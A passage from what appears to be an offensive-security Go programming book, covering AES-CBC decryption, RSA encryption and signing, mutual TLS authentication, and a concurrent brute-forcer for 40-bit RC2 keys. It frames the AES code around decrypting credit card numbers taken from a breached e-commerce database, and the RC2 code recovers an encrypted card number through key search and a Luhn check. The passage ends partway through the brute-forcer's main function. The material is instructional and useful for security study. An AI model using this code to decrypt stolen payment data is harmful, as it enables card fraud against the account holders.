it your received message and HMAC. As detailed previously, your checkMAC() func- tion computes an HMAC by using the received message and the shared secret key and returns a bool value for whether the received HMAC and cal- culated HMAC match. Although the HMAC does provide both authenticity and integrity assur- ance, it doesn’t ensure confidentiality. You can’t know for sure that the mes- sage itself wasn’t seen by unauthorized resources. The next section addresses this concern by exploring and implementing various types of encryption. 前沿信安资讯阵地 公众号:i nf osrc 242 Chapter 11 Encrypting Data Encryption is likely the most well-known cryptographic concept. After all, privacy and data protection have garnered significant news coverage due to high-profile data breaches, often resulting from organizations storing user passwords and other sensitive data in unencrypted formats. Even without the media attention, encryption should spark the interest of black hats and developers alike. After all, understanding the basic process and implementa- tion can be the difference between a lucrative data breach and a frustrating disruption to an attack kill chain. The following section presents the varying forms of encryption, including useful applications and use cases for each. Symmetric-Key Encryption Your journey into encryption will start with what is arguably its most straightforward form—symmetric-key encryption. In this form, both the encryption and decryption functions use the same secret key. Go makes symmetric cryptography pretty straightforward, because it supports most common algorithms in its default or extended packages. For the sake of brevity, we’ll limit our discussion of symmetric-key encryption to a single, practical example. Let’s imagine you’ve breached an organization. You’ve performed the necessary privilege escalation, lateral movement, and network recon to gain access to an e-commerce web server and the backend database. The database contains financial transactions; however, the credit card number used in those transactions is obviously encrypted. You inspect the application source code on the web server and determine that the organization is using the Advanced Encryption Standard (AES) encryption algorithm. AES supports multiple operating modes, each with slightly different considerations and implementation details. The modes are not interchangeable; the mode used for decryption must be identical to that used for encryption. In this scenario, let’s say you’ve determined that the application is using AES in Cipher Block Chaining (CBC) mode. So, let’s write a function that decrypts these credit cards (Listing 11-4). Assume that the symmetric key was hardcoded in the application or set statically in a configuration file. As you go through this example, keep in mind that you’ll need to tweak this implemen- tation for other algorithms or ciphers, but it’s a good starting place. func unpad(buf []byte) []byte { u // Assume valid length and padding. Should add checks padding := int(buf[len(buf)-1]) return buf[:len(buf)-padding] } func decrypt(ciphertext, key []byte) ([]byte, error) { v var ( plaintext []byte iv []byte block cipher.Block mode cipher.BlockMode 前沿信安资讯阵地 公众号:i nf osrc Implementing and Attacking Cryptography 243 err error ) if len(ciphertext) < aes.BlockSize { w return nil, errors.New("Invalid ciphertext length: too short") } if len(ciphertext)%aes.BlockSize != 0 { x return nil, errors.New("Invalid ciphertext length: not a multiple of blocksize") } iv = ciphertext[:aes.BlockSize] y ciphertext = ciphertext[aes.BlockSize:] if block, err = aes.NewCipher(key); err != nil { z return nil, err } mode = cipher.NewCBCDecrypter(block, iv) { plaintext = make([]byte, len(ciphertext)) mode.CryptBlocks(plaintext, ciphertext) | plaintext = unpad(plaintext) } return plaintext, nil } Listing 11-4: AES padding and decryption (/ch-11/aes/main.go) The code defines two functions: unpad() and decrypt(). The unpad() func- tion u is a utility function scraped together to handle the removal of pad- ding data after decryption. This is a necessary step, but beyond the scope of this discussion. Do some research on Public Key Cryptography Standards (PKCS) #7 padding for more information. It’s a relevant topic for AES, as it’s used to ensure that our data has proper block alignment. For this example, just know that you’ll need the function later to clean up your data. The function itself assumes some facts that you’d want to explicitly validate in a real-world scenario. Specifically, you’d want to confirm that the value of the padding bytes is valid, that the slice offsets are valid, and that the result is of appropriate length. The most interesting logic exists within the decrypt() function v, which takes two byte slices: the ciphertext you need to decrypt and the symmetric key you’ll use to do it. The function performs some validation to confirm that the ciphertext is at least as long as your block size w. This is a necessary step, because CBC mode encryption uses an initialization vector (IV) for randomness. This IV, like a salt value for password hashing, doesn’t need to remain secret. The IV, which is the same length as a single AES block, is prepended onto your ciphertext during encryption. If the ciphertext length is less than the expected block size, you know that you either have an issue with the cipher text or are missing the IV. You also check whether the cipher- text length is a multiple of the AES block size x. If it’s not, decryption will fail spectacularly, because CBC mode expects the ciphertext length to be a multiple of the block size. 前沿信安资讯阵地 公众号:i nf osrc 244 Chapter 11 Once you’ve completed your validation checks, you can proceed to decrypt the ciphertext. As mentioned previously, the IV is prepended to the ciphertext, so the first thing you do is extract the IV from the ciphertext y. You use the aes.BlockSize constant to retrieve the IV and then redefine your ciphertext variable to the remainder of your ciphertext via ciphertext = [aes.BlockSize:]. You now have your encrypted data separate from your IV. Next, you call aes.NewCipher(), passing it your symmetric-key value z. This initializes your AES block mode cipher, assigning it to a variable named block. You then instruct your AES cipher to operate in CBC mode by call- ing cipher.NewCBCDecryptor(block, iv) {. You assign the result to a variable named mode. (The crypto/cipher package contains additional initialization functions for other AES modes, but you’re using only CBC decryption here.) You then issue a call to mode.CryptBlocks(plaintext, ciphertext) to decrypt the contents of ciphertext | and store the result in the plaintext byte slice. Lastly, you } remove your PKCS #7 padding by calling your unpad() utility function. You return the result. If all went well, this should be the plaintext value of the credit card number. A sample run of the program produces the expected result: $ go run main.go key = aca2d6b47cb5c04beafc3e483b296b20d07c32db16029a52808fde98786646c8 ciphertext = 7ff4a8272d6b60f1e7cfc5d8f5bcd047395e31e5fc83d062716082010f637c8f21150eabace62 --snip-- plaintext = 4321123456789090 Notice that you didn’t define a main() function in this sample code. Why not? Well, decrypting data in unfamiliar environments has a variety of poten- tial nuances and variations. Are the ciphertext and key values encoded or raw binary? If they’re encoded, are they a hex string or Base64? Is the data locally accessible, or do you need to extract it from a data source or interact with a hardware security module, for example? The point is, decryption is rarely a copy-and-paste endeavor and often requires some level of understanding of algorithms, modes, database interaction, and data encoding. For this reason, we’ve chosen to lead you to the answer with the expectation that you’ll inevit- ably have to figure it out when the time is right. Knowing just a little bit about symmetric-key encryption can make your penetrations tests much more successful. For example, in our experience pilfering client source-code repositories, we’ve found that people often use the AES encryption algorithm, either in CBC or Electronic Codebook (ECB) mode. ECB mode has some inherent weaknesses and CBC isn’t any better, if implemented incorrectly. Crypto can be hard to understand, so often developers assume that all crypto ciphers and modes are equally effective and are ignorant of their subtleties. Although we don’t consider ourselves cryptographers, we know just enough to implement crypto securely in Go—and to exploit other people’s deficient implementations. Although symmetric-key encryption is faster than asymmetric crypto- graphy, it suffers from inherent key-management challenges. After all, to use it, you must distribute the same key to any and all systems or applica- tions that perform the encryption or decryption functions on the data. 前沿信安资讯阵地 公众号:i nf osrc Implementing and Attacking Cryptography 245 You must distribute the key securely, often following strict processes and auditing requirements. Also, relying solely on symmetric-key cryptography prevents arbitrary clients from, for example, establishing encrypted com- munications with other nodes. There isn’t a good way to negotiate the secret key, nor are there authentication or integrity assurances for many common algorithms and modes.1 That means anyone, whether authorized or malicious, who obtains the secret key can proceed to use it. This is where asymmetric cryptography can be of use. Asymmetric Cryptography Many of the problems associated with symmetric-key encryption are solved by asymmetric (or public-key) cryptography, which uses two separate but mathemati- cally related keys. One is available to the public and the other is kept private. Data encrypted by the private key can be decrypted only by the public key, and data encrypted by the public key can be decrypted only by the private key. If the private key is protected properly and kept, well, private, then data encrypted with the public key remains confidential, since you need the closely guarded private key to decrypt it. Not only that, but you could use the private key to authenticate a user. The user could use the private key to sign messages, for example, which the public could decrypt using the public key. So, you might be asking, “What’s the catch? If public-key cryptography provides all these assurances, why do we even have symmetric-key crypto- graphy?” Good question, you! The problem with public-key encryption is its speed; it’s a lot slower than its symmetric counterpart. To get the best of both worlds (and avoid the worst), you’ll often find organizations using a hybrid approach: they’ll use asymmetric crypto for the initial communications nego- tiation, establishing an encrypted channel through which they create and exchange a symmetric key (often called a session key). Because the session key is fairly small, using public-key crypto for this process requires little overhead. Both the client and server then have a copy of the session key, which they use to make future communications faster. Let’s look at a couple of common use cases for public-key crypto. Specifically, we’ll look at encryption, signature validation, and mutual authentication. Encryption and Signature Validation For this first example, you’ll use public-key crypto to encrypt and decrypt a message. You’ll also create the logic to sign a message and validate that signature. For simplicity, you’ll include all of this logic in a single main() function. This is meant to show you the core functionality and logic so that you can implement it. In a real-world scenario, the process is a little more complex, since you’re likely to have two remote nodes communicating with each other. These nodes would have to exchange public keys. Fortunately, this exchange process doesn’t require the same security assurances as 1. Some operating modes, such as Galois/Counter Mode (GCM), provide integrity assurance. 前沿信安资讯阵地 公众号:i nf osrc 246 Chapter 11 exchanging symmetric keys. Recall that any data encrypted with the pub- lic key can be decrypted only by the related private key. So, even if you perform a man-in-the-middle attack to intercept the public-key exchange and future communications, you won’t be able to decrypt any of the data encrypted by the same public key. Only the private key can decrypt it. Let’s take a look at the implementation shown in Listing 11-5. We’ll elab- orate on the logic and cryptographic functionality as we review the example. func main() { var ( err error privateKey *rsa.PrivateKey publicKey *rsa.PublicKey message, plaintext, ciphertext, signature, label []byte ) if privateKey, err = rsa.GenerateKey(rand.Reader, 2048)u; err != nil { log.Fatalln(err) } publicKey = &privateKey.PublicKey v label = []byte("") message = []byte("Some super secret message, maybe a session key even") ciphertext, err = rsa.EncryptOAEP(sha256.New(), rand.Reader, publicKey, message, label) w if err != nil { log.Fatalln(err) } fmt.Printf("Ciphertext: %x\n", ciphertext) plaintext, err = rsa.DecryptOAEP(sha256.New(), rand.Reader, privateKey, ciphertext, label) x if err != nil { log.Fatalln(err) } fmt.Printf("Plaintext: %s\n", plaintext) h := sha256.New() h.Write(message) signature, err = rsa.SignPSS(rand.Reader, privateKey, crypto.SHA256, h.Sum(nil), nil) y if err != nil { log.Fatalln(err) } fmt.Printf("Signature: %x\n", signature) err = rsa.VerifyPSS(publicKey, crypto.SHA256, h.Sum(nil), signature, nil)z if err != nil { log.Fatalln(err) } fmt.Println("Signature verified") } Listing 11-5: Asymmetric, or public-key, encryption (/ch-11/public-key /main.go/) 前沿信安资讯阵地 公众号:i nf osrc Implementing and Attacking Cryptography 247 The program demonstrates two separate but related public-key crypto functions: encryption/decryption and message signing. You first generate a public/private key pair by calling the rsa.GenerateKey() function u. You sup- ply a random reader and a key length as input parameters to the function. Assuming the random reader and key lengths are adequate to generate a key, the result is an *rsa.PrivateKey instance that contains a field whose value is the public key. You now have a working key pair. You assign the public key to its own variable for the sake of convenience v. This program generates this key pair every time it’s run. In most cir- cumstances, such as SSH communications, you’ll generate the key pair a single time, and then save and store the keys to disk. The private key will be kept secure, and the public key will be distributed to endpoints. We’re skip- ping key distribution, protection, and management here, and focusing only on the cryptographic functions. Now that you’ve created the keys, you can start using them for encryp- tion. You do so by calling the function rsa.EncryptOAEP() w, which accepts a hashing function, a reader to use for padding and randomness, your public key, the message you wish to encrypt, and an optional label. This function returns an error (if the inputs cause the algorithm to fail) and our cipher- text. You can then pass the same hashing function, a reader, your private key, your ciphertext, and a label into the function rsa.DecryptOAEP() x. The function decrypts the ciphertext by using your private key and returns the cleartext result. Notice that you’re encrypting the message with the public key. This ensures that only the holder of the private key will have the ability to decrypt the data. Next you create a digital signature by calling rsa.SignPSS() y. You pass to it, again, a random reader, your private key, the hashing function you’re using, the hash value of the message, and a nil value representing additional options. The function returns any errors and the resulting signa- ture value. Much like human DNA or fingerprints, this signature uniquely identifies the identity of the signer (that is, the private key). Anybody hold- ing the public key can validate the signature to not only determine the authenticity of the signature but also validate the integrity of the message. To validate the signature, you pass the public key, hash function, hash value, signature, and additional options to rsa.VerifyPSS() z. Notice that in this case you’re passing the public key, not the private key, into this function. Endpoints wishing to validate the signature won’t have access to the private key, nor will validation succeed if you input the wrong key value. The rsa .VerifyPSS() function returns nil when the signature is valid and an error when it’s invalid. Here is a sample run of the program. It behaves as expected, encrypt- ing the message by using a public key, decrypting it by using a private key, and validating the signature: $ go run main.go Ciphertext: a9da77a0610bc2e5329bc324361b480ba042e09ef58e4d8eb106c8fc0b5 --snip-- Plaintext: Some super secret message, maybe a session key even 前沿信安资讯阵地 公众号:i nf osrc 248 Chapter 11 Signature: 68941bf95bbc12edc12be369f3fd0463497a1220d9a6ab741cf9223c6793 --snip-- Signature verified Next up, let’s look at another application of public-key cryptography: mutual authentication. Mutual Authentication Mutual authentication is the process by which a client and server authenticate each other. They do this with public-key cryptography; both the client and server generate public/private key pairs, exchange public keys, and use the public keys to validate the authenticity and identity of the other endpoint. To accomplish this feat, both the client and server must do some legwork to set up the authorization, explicitly defining the public key value with which they intend to validate the other. The downside to this process is the admin- istrative overhead of having to create unique key pairs for every single node and ensuring that the server and the client nodes have the appropriate data to proceed properly. To begin, you’ll knock out the administrative tasks of creating key pairs. You’ll store the public keys as self-signed, PEM-encoded certificates. Let’s use the openssl utility to create these files. On your server, you’ll create the server’s private key and certificate by entering the following: $ openssl req -nodes -x509 -newkey rsa:4096 -keyout serverKey.pem -out serverCrt.pem -days 365 The openssl command will prompt you for various inputs, to which you can supply arbitrary values for this example. The command creates two files: serverKey.pem and serverCrt.pem. The file serverKey.pem contains your pri- vate key, and you should protect it. The serverCrt.pem file contains the serv- er’s public key, which you’ll distribute to each of your connecting clients. For every connecting client, you’ll run a command similar to the preceding one: $ openssl req -nodes -x509 -newkey rsa:4096 -keyout clientKey.pem -out clientCrt.pem -days 365 This command also generates two files: clientKey.pem and clientCrt.pem. Much as with the server output, you should protect the client’s private key. The clientCrt.pem certificate file will be transferred to your server and loaded by your program. This will allow you to configure and identify the client as an authorized endpoint. You’ll have to create, transfer, and con- figure a certificate for each additional client so that the server can identify and explicitly authorize them. In Listing 11-6, you set up an HTTPS server that requires a client to provide a legitimate, authorized certificate. func helloHandler(w http.ResponseWriter, r *http.Request) { u fmt.Printf("Hello: %s\n", r.TLS.PeerCertificates[0].Subject.CommonName) v fmt.Fprint(w, "Authentication successful") 前沿信安资讯阵地 公众号:i nf osrc Implementing and Attacking Cryptography 249 } func main() { var ( err error clientCert []byte pool *x509.CertPool tlsConf *tls.Config server *http.Server ) http.HandleFunc("/hello", helloHandler) if clientCert, err = ioutil.ReadFile("../client/clientCrt.pem")w; err != nil { log.Fatalln(err) } pool = x509.NewCertPool() pool.AppendCertsFromPEM(clientCert) x tlsConf = &tls.Config{ y ClientCAs: pool, ClientAuth: tls.RequireAndVerifyClientCert, } tlsConf.BuildNameToCertificate() z server = &http.Server{ Addr: ":9443", TLSConfig: tlsConf, { } log.Fatalln(server.ListenAndServeTLS("serverCrt.pem", "serverKey.pem")|) } Listing 11-6: Setting up a mutual authentication server (/ch-11 /mutual-auth/cmd /server/main.go) Outside the main() function, the program defines a helloHandler() func- tion u. As we discussed way back in Chapters 3 and 4, the handler function accepts an http.ResponseWriter instance and the http.Request itself. This handler is pretty boring. It logs the common name of the client certificate received v. The common name is accessed by inspecting the http.Request’s TLS field and drilling down into the certificate PeerCertificates data. The handler function also sends the client a message indicating that authentica- tion was successful. But how do you define which clients are authorized, and how do you authenticate them? The process is fairly painless. You first read the client’s certificate from the PEM file the client created previously w. Because it’s possible to have more than one authorized client certificate, you create a certificate pool and call pool.AppendCertsFromPEM(clientCert) to add the client certificate to your pool x. You perform this step for each additional client you wish to authenticate. Next, you create your TLS configuration. You explicitly set the ClientCAs field to your pool and configure ClientAuth to tls.RequireAndVerifyClientCert y. 前沿信安资讯阵地 公众号:i nf osrc 250 Chapter 11 This configuration defines your pool of authorized clients and requires clients to properly identify themselves before they’ll be allowed to proceed. You issue a call to tlsConf.BuildNameToCertificate() so that the client’s com- mon and subject alternate names—the domain names for which the cer- tificate was generated—will properly map to their given certificate z. You define your HTTP server, explicitly setting your custom configuration {, and start the server by calling server.ListenAndServeTLS(), passing to it the server certificate and private-key files you created previously |. Note that you don’t use the client’s private-key file anywhere in the server code. As we’ve said before, the private key remains private; your server will be able to identify and authorize clients by using only the client’s public key. This is the brilliance of public-key crypto. You can validate your server by using curl. If you generate and supply a bogus, unauthorized client certificate and key, you’ll be greeted with a ver- bose message telling you so: $ curl -ik -X GET --cert badCrt.pem --key badKey.pem \ https://server.blackhat-go.local:9443/hello curl: (35) gnutls_handshake() failed: Certificate is bad You’ll also get a more verbose message on the server, something like this: http: TLS handshake error from remote error: tls: unknown certificate authority On the flip side, if you supply the valid certificate and the key that matches the certificate configured in the server pool, you’ll enjoy a small moment of glory as it successfully authenticates: $ curl -ik -X GET --cert clientCrt.pem --key clientKey.pem \ https://server.blackhat-go.local:9443/hello HTTP/1.1 200 OK Date: Fri, 09 Oct 2020 16:55:52 GMT Content-Length: 25 Content-Type: text/plain; charset=utf-8 Authentication successful This message tells you the server works as expected. Now, let’s have a look at a client (Listing 11-7). You can run the client on either the same system as the server or a different one. If it’s on a different system, you’ll need to transfer clientCrt.pem to the server and serverCrt.pem to the client. func main() { var ( err error cert tls.Certificate serverCert, body []byte pool *x509.CertPool tlsConf *tls.Config 前沿信安资讯阵地 公众号:i nf osrc Implementing and Attacking Cryptography 251 transport *http.Transport client *http.Client resp *http.Response ) if cert, err = tls.LoadX509KeyPair("clientCrt.pem", "clientKey.pem"); err != nil { u log.Fatalln(err) } if serverCert, err = ioutil.ReadFile("../server/serverCrt.pem"); err != nil { v log.Fatalln(err) } pool = x509.NewCertPool() pool.AppendCertsFromPEM(serverCert) w tlsConf = &tls.Config{ x Certificates: []tls.Certificate{cert}, RootCAs: pool, } tlsConf.BuildNameToCertificate()y transport = &http.Transport{ z TLSClientConfig: tlsConf, } client = &http.Client{ { Transport: transport, } if resp, err = client.Get("https://server.blackhat-go.local:9443/hello"); err != nil { | log.Fatalln(err) } if body, err = ioutil.ReadAll(resp.Body); err != nil { } log.Fatalln(err) } defer resp.Body.Close() fmt.Printf("Success: %s\n", body) } Listing 11-7: The mutual authentication client (/ch-11/mutual-auth/cmd /client /main.go) A lot of the certificate preparation and configuration will look similar to what you did in the server code: creating a pool of certificates and prepar- ing subject and common names. Since you won’t be using the client certifi- cate and key as a server, you instead call tls.LoadX509KeyPair("clientCrt.pem", "clientKey.pem") to load them for use later u. You also read the server certifi- cate, adding it to the pool of certificates you wish to allow v. You then use the pool and client certificates w to build your TLS configuration x, and call tlsConf.BuildNameToCertificate() to bind domain names to their respec- tive certificates y. Since you’re creating an HTTP client, you have to define a transport z, correlating it with your TLS configuration. You can then use the transport 前沿信安资讯阵地 公众号:i nf osrc 252 Chapter 11 instance to create an http.Client struct {. As we discussed in Chapters 3 and 4, you can use this client to issue an HTTP GET request via client.Get ("https://server.blackhat-go.local:9443/hello") |. All the magic happens behind the scenes at this point. Mutual authen- tication is performed—the client and the server mutually authenticate each other. If authentication fails, the program returns an error and exits. Otherwise, you read the HTTP response body and display it to stdout }. Running your client code produces the expected result, specifically, that there were no errors thrown and that authentication succeeds: $ go run main.go Success: Authentication successful Your server output is shown next. Recall that you configured the server to log a hello message to standard output. This message contains the com- mon name of the connecting client, extracted from the certificate: $ go run main.go Hello: client.blackhat-go.local You now have a functional sample of mutual authentication. To further enhance your understanding, we encourage you to tweak the previous examples so they work over TCP sockets. In the next section, you’ll dedicate your efforts to a more devious pur- pose: brute-forcing RC2 encryption cipher symmetric keys. Brute-Forcing RC2 RC2 is a symmetric-key block cipher created by Ron Rivest in 1987. Prompted by recommendations from the government, the designers used a 40-bit encryption key, which made the cipher weak enough that the US govern- ment could brute-force the key and decrypt communications. It provided ample confidentiality for most communications but allowed the government to peep into chatter with foreign entities, for example. Of course, back in the 1980s, brute-forcing the key required significant computing power, and only well-funded nation states or specialty organizations had the means to decrypt it in a reasonable amount of time. Fast-forward 30 years; today, the common home computer can brute-force a 40-bit key in a few days or weeks. So, what the heck, let’s brute force a 40-bit key. Getting Started Before we dive into the code, let’s set the stage. First of all, neither the stan- dard nor extended Go crypto libraries have an RC2 package intended for public consumption. However, there’s an internal Go package for it. You can’t import internal packages directly in external programs, so you’ll have to find another way to use it. 前沿信安资讯阵地 公众号:i nf osrc Implementing and Attacking Cryptography 253 Second, to keep things simple, you’ll make some assumptions about the data that you normally wouldn’t want to make. Specifically, you’ll assume that the length of your cleartext data is a multiple of the RC2 block size (8 bytes) to avoid clouding your logic with administrative tasks like han- dling PKCS #5 padding. Handling the padding is similar to what you did with AES previously in this chapter (see Listing 11-4), but you’d need to be more diligent in validating the contents to maintain the integrity of the data you’ll be working with. You’ll also assume that your ciphertext is an encrypted credit card number. You’ll check the potential keys by validating the resulting plaintext data. In this case, validating the data involves mak- ing sure the text is numeric and then subjecting it to a Luhn check, which is a method of validating credit card numbers and other sensitive data. Next, you’ll assume you were able to determine—perhaps from pilfer- ing filesystem data or source code—that the data is encrypted using a 40-bit key in ECB mode with no initialization vector. RC2 supports variable-length keys and, since it’s a block cipher, can operate in different modes. In ECB mode, which is the simplest mode, blocks of data are encrypted indepen- dently of other blocks. This will make your logic a little more straightforward. Lastly, although you can crack the key in a nonconcurrent implementation, if you so choose, a concurrent implementation will be far better perform- ing. Rather than building this thing iteratively, showing first a noncon- current version followed by a concurrent one, we’ll go straight for the concurrent build. Now you’ll install a couple of prerequisites. First, retrieve the official RC2 Go implementation from https://github.com/golang/crypto/blob/master /pkcs12/internal/rc2/rc2.go. You’ll need to install this in your local workspace so that you can import it into your brute-forcer. As we mentioned earlier, the package is an internal package, meaning that, by default, outside pack- ages can’t import and use it. This is a little hacky, but it’ll prevent you from having to use a third-party implementation or—shudder—writing your own RC2 cipher code. If you copy it into your workspace, the non-exported func- tions and types become part of your development package, which makes them accessible. Let’s also install a package that you’ll use to perform the Luhn check: $ go get github.com/joeljunstrom/go-luhn A Luhn check calculates checksums on credit card numbers or other identification data to determine whether they’re valid. You’ll use the exist- ing package for this. It’s well-documented and it’ll save you from re-creating the wheel. Now you can write your code. You’ll need to iterate through every combination of the entire key space (40-bits), decrypting your ciphertext with each key, and then validating your result by making sure it both consists of only numeric characters and passes a Luhn check. You’ll use a producer/consumer model to manage the work—the producer will push a key to a channel and the consumers will read the key from the channel and execute accordingly. The work itself will be a single key value. When you 前沿信安资讯阵地 公众号:i nf osrc 254 Chapter 11 find a key that produces properly validated plaintext (indicating you found a credit card number), you’ll signal each of the goroutines to stop their work. One of the interesting challenges of this problem is how to iterate the key space. In our solution, you iterate it using a for loop, traversing the key space represented as uint64 values. The challenge, as you’ll see, is that uint64 occupies 64 bits of space in memory. So, converting from a uint64 to a 40-bit (5-byte) []byte RC2 key requires that you crop off 24 bits (3 bytes) of unnec- essary data. Hopefully, this process becomes clear once you’ve looked at the code. We’ll take it slow, breaking down sections of the program and work- ing through them one by one. Listing 11-8 begins the program. import ( "crypto/cipher" "encoding/binary" "encoding/hex" "fmt" "log" "regexp" "sync" u luhn "github.com/joeljunstrom/go-luhn" v "github.com/bhg/ch-11/rc2-brute/rc2" ) w var numeric = regexp.MustCompile(`^\d{8}$`) x type CryptoData struct { block cipher.Block key []byte } Listing 11-8: Importing the RC2 brute-force type (/ch-11 /rc2-brute/main.go) We’ve included the import statements here to draw attention to the inclusion of the third-party go-luhn package u, as well as the inclusion of the rc2 package v you cloned from the internal Go repository. You also compile a regular expression w that you’ll use to check whether the result- ing plaintext block is 8 bytes of numeric data. Note that you’re checking 8 bytes of data and not 16 bytes, which is the length of your credit card number. You’re checking 8 bytes because that’s the length of an RC2 block. You’ll be decrypting your ciphertext block by block, so you can check the first block you decrypt to see whether it’s numeric. If the 8 bytes of the block aren’t all numeric, you can confidently assume that you aren’t dealing with a credit card number and can skip the decryption of the second block of ciphertext altogether. This minor perfor- mance improvement will significantly reduce the time it takes to execute millions of times over. 前沿信安资讯阵地 公众号:i nf osrc Implementing and Attacking Cryptography 255 Lastly, you define a type named CryptoData x that you’ll use to store your key and a cipher.Block. You’ll use this struct to define units of work, which producers will create and consumers will act upon. Producing Work Let’s look at the producer function (Listing 11-9). You place this function after your type definitions in the previous code listing. u func generate(start, stop uint64, out chan <- *CryptoData,\ done <- chan struct{}, wg *sync.WaitGroup) { v wg.Add(1) w go func() { x defer wg.Done() var ( block cipher.Block err error key []byte data *CryptoData ) y for i := start; i <= stop; i++ { key = make([]byte, 8) z select { { case <- done: return | default: } binary.BigEndian.PutUint64(key, i) if block, err = rc2.New(key[3:], 40); err != nil { log.Fatalln(err) } data = &CryptoData{ block: block, key: key[3:], } ~ out <- data } } }() return } Listing 11-9: The RC2 producer function (/ch-11 /rc2-brute /main.go) Your producer function is named generate() u. It accepts two uint64 vari- ables used to define a segment of the key space on which the producer will create work (basically, the range over which they’ll produce keys). This allows you to break up the key space, distributing portions of it to each producer. The function also accepts two channels: a *CryptData write-only chan- nel used for pushing work to consumers and a generic struct channel that’ll be used for receiving signals from consumers. This second channel 前沿信安资讯阵地 公众号:i nf osrc 256 Chapter 11 is necessary so that, for example, a consumer that identifies the correct key can explicitly signal the producer to stop producing. No sense creat- ing more work if you’ve already solved the problem. Lastly, your function accepts a WaitGroup to be used for tracking and synchronizing producer execution. For each concurrent producer that runs, you execute wg.Add(1) v to tell the WaitGroup that you started a new producer. You populate your work channel within a goroutine w, including a call to defer wg.Done() x to notify your WaitGroup when the goroutine exits. This will prevent deadlocks later as you try to continue execution from your main() function. You use your start() and stop() values to iterate a subsec- tion of the key space by using a for loop y. Every iteration of the loop incre- ments the i variable until you’ve reached your ending offset. As we mentioned previously, your key space is 40 bits, but i is 64 bits. This size difference is crucial to understand. You don’t have a native Go type that is 40 bits. You have only 32- or 64-bit types. Since 32 bits is too small to hold a 40-bit value, you need to use your 64-bit type instead, and account for the extra 24 bits later. Perhaps you could avoid this whole chal- lenge if you could iterate the entire key space by using a []byte instead of a uint64. But doing so would likely require some funky bitwise opera- tions that may overcomplicate the example. So, you’ll deal with the length nuance instead. Within your loop, you include a select statement z that may look silly at first, because it’s operating on channel data and doesn’t fit the typical syntax. You use it to check whether your done channel has been closed via case <- done {. If the channel is closed, you issue a return statement to break out of your goroutine. When the done channel isn’t closed, you use the default case | to create the crypto instances necessary to define work. Specifically, you call binary.BigEndian.PutUint64(key, i) } to write your uint64 value (the current key) to a []byte named key. Although we didn’t explicitly call it out earlier, you initialized key as an 8-byte slice. So why are you defining the slice as 8 bytes when you’re dealing with only a 5-byte key? Well, since binary.BigEndian.PutUint64 takes a uint64 value, it requires a destination slice of 8 bytes in length or else it throws an index-out-of-range error. It can’t fit an 8-byte value into a 5-byte slice. So, you give it an 8-byte slice. Notice throughout the remainder of the code, you use only the last 5 bytes of the key slice; even though the first 3 bytes will be zero, they will still corrupt the austerity of our crypto functions if included. This is why you call rc2.New(key[3:], 40) to create your cipher initially; doing so drops the 3 irrelevant bytes and also passes in the length, in bits, of your key: 40. You use the resulting cipher.Block instance and the relevant key bytes to create a CryptoData object, and you write it to the out worker channel ~. That’s it for the producer code. Notice that in this section you’re only bootstrapping the relevant key data needed. Nowhere in the function are you actually attempting to decrypt the ciphertext. You’ll perform this work in your consumer function. 前沿信安资讯阵地 公众号:i nf osrc Implementing and Attacking Cryptography 257 Performing Work and Decrypting Data Let’s review the consumer function now (Listing 11-10). Again, you’ll add this function to the same file as your previous code. u func decrypt(ciphertext []byte, in <- chan *CryptoData, \ done chan struct{}, wg *sync.WaitGroup) { size := rc2.BlockSize plaintext := make([]byte, len(ciphertext)) v wg.Add(1) go func() { w defer wg.Done() x for data := range in { select { y case <- done: return z default: { data.block.Decrypt(plaintext[:size], ciphertext[:size]) | if numeric.Match(plaintext[:size]) { } data.block.Decrypt(plaintext[size:], ciphertext[size:]) ~ if luhn.Valid(string(plaintext)) && \ numeric.Match(plaintext[size:]) { fmt.Printf("Card [%s] found using key [%x]\n", / plaintext, data.key) close(done) return } } } } }() } Listing 11-10: The RC2 consumer function (/ch-11 /rc2-brute/main.go) Your consumer function, named decrypt() u, accepts several param- eters. It receives the ciphertext you wish to decrypt. It also accepts two separate channels: a read-only *CryptoData channel named in that you’ll use as a work queue and a channel named done that you’ll use for sending and receiving explicit cancellation signals. Lastly, it also accepts a *sync .WaitGroup named wg that you’ll use for managing your consumer workers, much like your producer implementation. You tell your WaitGroup that you’re starting a worker by calling wg.Add(1) v. This way, you’ll be able to track and manage all the consumers that are running. Next, inside your goroutine, you call defer wg.Done() w so that when the goroutine function ends, you’ll update the WaitGroup state, reducing the number of running workers by one. This WaitGroup business is necessary for you to synchronize the execution of your program across an arbitrary num- ber of workers. You’ll use the WaitGroup in your main() function later to wait for your goroutines to complete. 前沿信安资讯阵地 公众号:i nf osrc 258 Chapter 11 The consumer uses a for loop x to repeatedly read CryptoData work structs from the in channel. The loop stops when the channel is closed. Recall that the producer populates this channel. As you’ll see shortly, this channel closes after the producers have iterated their entire key space subsections and pushed the relative crypto data onto the work channel. Therefore, your consumer loops until the producers are done producing. As you did in the producer code, you use a select statement within the for loop to check whether the done channel has been closed y, and if it has, you explicitly signal the consumer to stop additional work efforts. A worker will close the channel when a valid credit card number has been identified, as we’ll discuss in a moment. Your default case z performs the crypto heavy lifting. First, it decrypts the first block (8 bytes) of ciphertext {, checking whether the resulting plaintext is an 8-byte, numeric value |. If it is, you have a potential card number and proceed to decrypt the second block of ciphertext }. You call these decryption functions by accessing the cipher .Block field within your CryptoData work object that you read in from the channel. Recall that the producer instantiated the struct by using a unique key value taken from the key space. Lastly, you validate the entirety of the plaintext against the Luhn algo- rithm and validate that the second block of plaintext is an 8-byte, numeric value ~. If these checks succeed, you can be reasonably sure that you found a valid credit card number. You display the card number and the key to stdout and call close(done) to signal the other goroutines that you’ve found what you’re after. Writing the Main Function By this point, you have your producer and consumer functions, both equipped to execute with concurrency. Now, let’s tie it all together in your main() function (Listing 11-11), which will appear in the same source file as the previous listings. func main() { var ( err error ciphertext []byte ) if ciphertext, err = hex.DecodeString("0986f2cc1ebdc5c2e25d04a136fa1a6b"); err != nil { u log.Fatalln(err) } var prodWg, consWg sync.WaitGroup v var min, max, prods = uint64(0x0000000000), uint64(0xffffffffff), uint64(75) var step = (max - min) / prods done := make(chan struct{}) work := make(chan *CryptoData, 100) if (step * prods) < max { w step += prods } 前沿信安资讯阵地 公众号:i nf osrc Implementing and Attacking Cryptography 259 var start, end = min, min + step log.Println("Starting producers...") for i := uint64(0); i < prods; i++ { x if end > max { end = max } generate(start, end, work, done, &prodWg) y end += step start += step } log.Println("Producers started!") log.Println("Starting consumers...") for i := 0; i < 30; i++ { z decrypt(ciphertext, work, done, &consWg) { } log.Println("Consumers started!") log.Println("Now we wait...") prodWg.Wait()| close(work) consWg.Wait()} log.Println("Brute-force 